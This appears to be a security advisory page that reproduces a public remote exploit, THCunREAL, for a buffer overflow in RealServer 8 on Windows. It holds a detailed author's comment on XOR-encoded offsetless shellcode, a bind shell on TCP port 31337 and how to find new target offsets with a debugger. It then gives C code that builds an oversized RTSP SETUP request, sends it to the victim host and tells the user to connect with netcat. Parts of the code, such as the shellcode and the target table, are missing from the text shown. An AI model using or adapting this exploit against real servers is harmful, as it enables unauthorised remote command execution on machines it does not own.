A vulnerability in Real Networks' RealServer allows a remote attacker to cause it to crash, while executing arbitrary code (for additional information see our previous article: RealSystem Server and Proxy Buffer Overflow Vulnerability). The following exploit code can be used to test your system for the mentioned vulnerability
Vulnerable systems:
* RealServer version 8.0.0.149
* RealServer version 8.0.2
/*****************************************************************************/
/* THCunREAL 0.1 - Wind0wZ remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* This exploit can be freely distributed ! If u r smart enough you can add */
/* further offsets for other OS Versions/Types/Servicespacks blabla.... */
/* */
/* The exploit was tested on 4 different boxes with RealServer 8.0.0.149 */
/* The bug is exploitable on Realservers < 8.0.2 */
/* */
/* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554 */
/* i noticed that 99% of the probed machines are not up2date yet ! =;O) */
/* */
/* The shellcode used in diz exploit is completely offsetless and XOR 0x20 */
/* encoded, coz Realserver doesn't allow the following bytes in the SETUP */
/* field : 0x00,0x0d,0x0a,0x25,0x20,0xff ! That's also the reason why i use */
/* mov dl,0x1f + add dl,0x01 for xor 0x20 encoding. hehehe... */
/* */
/* The shellcode itself scans for the KERNEL32.DLL by using FS:0 + searching */
/* for 'MZ' entry, followed by analysing the PE-Header for API offsets */
/* needed by this shellcode. After that we can load WS2_32.DLL for socket */
/* APIs and begin the usual shellcode process ! Thanx to several virus */
/* coders and Halvar Flake for that rocking idea ! I was wondering why so */
/* less people aren't using it today in their exploits ! Just because LSD */
/* has made this technique public on HiverCon 2002 ! Actually this one isn't */
/* optimized, but later shellcodes will have a size < 300 bytes. */
/* */
/* After successful exploitation of this bug, a commandshell should spawn on */
/* TCP port 31337 ! Use netcat to connect to this port ! */
/* */
/* To find further offsets use softice on windows or gdb on linux boxes ! */
/* If you're debbugging with softice do the following to find offsets : */
/* Start the Realserver 8 ! ;) */
/* Enter softice and do the following commands : */
/* addr rmserver + bpx 405cfc */
/* Start the exploit and softice will break on the following lines of code : */
/* */
/* mov ecx,[eax] */
/* lea edx,[ebp+FFFFF000] */
/* push 00 */
/* push edx */
/* push 80004005 */
/* push 80004005 */
/* push 03 */
/* call [ecx+0c] */
/* */
/* As we can overwrite EAX, we have to create 3 values */
/* (2 retlocs and 1 retaddr), to get control of a vuln system ! */
/* The good news is, that just the EAX value can differ on different OSs/SPs */
/* The rest can be calculated ! */
/* retloc2 = retloc1-8; */
/* retaddr = retloc1+8; */
/* */
/* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8 */
/* runs on. I just know it's also exploitable on other OSs ! */
/* So if u wanna exploit other platforms, try to get Realserver 8 and use */
/* gdb to find out, how this can be exploited ! Good luck ! */
/* */
/* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, zip, zilvio and the rest of the combo ...... */
/*****************************************************************************/
memset(exploit_buffer,'Z',4123);
memcpy(exploit_buffer,"SETUP /",7);
*(unsigned long *)&exploit_buffer[7] = retloc2;
*(unsigned long *)&exploit_buffer[7 + 4] = retaddr;
memcpy(&exploit_buffer[15],w32portshell,strlen(w32portshell));
*(unsigned long *)&exploit_buffer[4086] = targets[atoi(argv[2])].retloc1;
memcpy(&exploit_buffer[4090]," RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n",33);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(realport);
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,exploit_buffer,4123,0);
printf("\nexploit send .... sleeping a while ....\n");
Sleep(1000);
printf("\nok ... now try to connect to port 31337 via netcat !\n");
}
else
printf("can't connect to realserver port!\n");
shutdown(sock,1);
closesocket(sock);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <Host> <target-type>\n");
printf("\nTargets available :\n\n");
for (a=0; targets[a].winver != NULL; a++)
printf ("%d) - %s\n", a, targets[a].winver);
exit(0);
}
